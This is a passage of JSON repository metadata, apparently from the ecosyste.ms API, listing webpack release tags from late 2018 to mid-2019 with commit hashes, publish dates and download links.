":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/t